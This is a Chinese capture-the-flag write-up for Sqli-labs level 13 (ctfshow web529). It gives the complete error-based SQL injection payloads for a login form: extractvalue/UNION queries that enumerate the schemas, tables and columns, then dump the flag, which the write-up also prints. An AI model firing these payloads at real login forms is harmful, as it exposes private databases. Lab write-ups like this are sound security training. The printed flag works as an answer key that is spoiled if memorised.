Sqli-labs 13关 (web529)
还是和之前一样的界面
闭合和位数就不测了。闭合是')'
,位数是2
。有报错信息,那我们就来巩固一下报错注入吧。
爆库: ctfshow
uname=-1') union select 1,(extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata))))--+&passwd=123456&submit=Submit
- 1
- 1
爆表:flag
uname=-1') union select 1,(extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'))))--+&passwd=123456&submit=Submit
- 1
- 1
爆列:flag4
uname=-1') union select 1,(extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'))))--+&passwd=123456&submit=Submit
- 1
- 1
获取字段(flag):ctfshow{9328fa92-cc6b-4bf8-9f1b-b9eb9536a064}
uname=-1') union select 1,(extractvalue(1,concat(0x7e,(select group_concat(flag4) from ctfshow.flag)))) --+&passwd=123456&submit=Submit
- 1
- 1
ctfshow{9328fa92-cc6b-4bf8-9f1b
倒着读:
uname=-1') union select 1,(extractvalue(1,concat(0x7e,(select reverse(group_concat(flag4)) from ctfshow.flag)))) --+&passwd=123456&submit=Submit
- 1
- 1
脚本逆序后为92-cc6b-4bf8-9f1b-b9eb9536a064}